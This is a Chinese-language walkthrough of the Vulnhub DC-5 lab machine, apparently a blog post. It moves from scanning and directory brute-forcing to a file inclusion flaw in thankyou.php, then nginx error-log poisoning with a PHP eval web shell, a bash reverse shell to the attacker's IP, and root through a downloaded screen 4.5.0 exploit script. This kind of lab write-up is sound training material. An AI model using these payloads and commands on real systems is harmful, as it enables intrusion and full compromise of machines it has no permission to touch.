Vulnhub靶机:DC5

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC5(10.0.2.58)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/dc/DC-5.zip

二、信息收集

使用nmap主机发现靶机ip:10.0.2.58

使用nmap端口扫描发现靶机开放端口:80、111、40315

复制代码
nmap -A 10.0.2.58 -p 1-65535

打开网站未发现可利用的功能点,查看源码也没有发现隐藏信息

使用gobuster和dirsearch工具爆破目录

复制代码
gobuster dir -u http://10.0.2.58/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.58


网站没有什么可利用的功能点,可以尝试对每一个爆破出来的php文件进行模糊性测试,看看也没有LFI。

发现thankyou.php文件存在文件包含漏洞

复制代码
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://10.0.2.58/thankyou.php?FUZZ=/etc/passwd


三、漏洞利用

根据nmap的扫描结果,靶机使用nginx搭建网站,可以尝试包含nginx的配置文件。

复制代码
http://10.0.2.58/thankyou.php?file=/etc/nginx/nginx.conf

配置文件中获得了nginx错误日志的路径和访问日志路径

复制代码
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

直接包含nginx错误日志和访问日志,看看

发现错误日志包含成功,访问日志包含失败。那么我们可以利用错误日志来构造合法的php代码,从而利用包含漏洞

构造错误请求,写入错误日志,注意直接使用浏览器写入<>会被url编码,使用蚁剑连接失败,使用burpsuite写入连接成功

复制代码
http://10.0.2.58/thankyou.php?file=<?php @eval($_POST['pass']);?>


反弹shell

复制代码
bash -c 'bash -i >& /dev/tcp/10.0.2.15/4444 0>&1'

获取交互式shell

复制代码
python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

执行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现存在可以文件/bin/screen-4.5.0

使用searchsploit搜索screen v4.5.0的历史漏洞,发现存在提权漏洞

复制代码
searchsploit screen 4.5.0       

将exp下载下来,通过web服务上传到靶机,执行进行提权

复制代码
cd /tmp
wget http://10.0.2.15/41154.sh
chmod +x 41154.sh
./41154.sh

获取flag

相关推荐
安全渗透Hacker1 分钟前
PHPStudy快速搭建DVWA靶场完整指南
安全·web安全·网络安全·安全性测试
真上帝的左手1 小时前
7. 网络安全-等保
网络·安全·web安全
小张的博客之旅2 小时前
“复兴杯”2025第五届大学生网络安全精英赛 (排位赛wp)
网络·安全·web安全
菜根Sec2 小时前
网络安全笑话
web安全·网络安全·渗透测试
漏洞文库-Web安全2 小时前
强网杯 2024 web pyblockly 单题wp
安全·web安全·网络安全·ctf
安全渗透Hacker3 小时前
新一代特征扫描器afrog与经典引擎Xray深度解析
网络·安全·web安全·网络安全·自动化·系统安全·安全性测试
Fnetlink13 小时前
零信任网络架构是什么及零信任的发展趋势
安全·web安全
白帽子黑客杰哥4 小时前
Hack The Box和Try Hack Me两个平台在渗透测试训练上各有什么特色?
安全·web安全
培培说证4 小时前
2026高职网络安全专业入门级证书大全。
安全·web安全
Psycho_MrZhang5 小时前
Web安全之SQL注入-CSRF-XSS
sql·web安全·csrf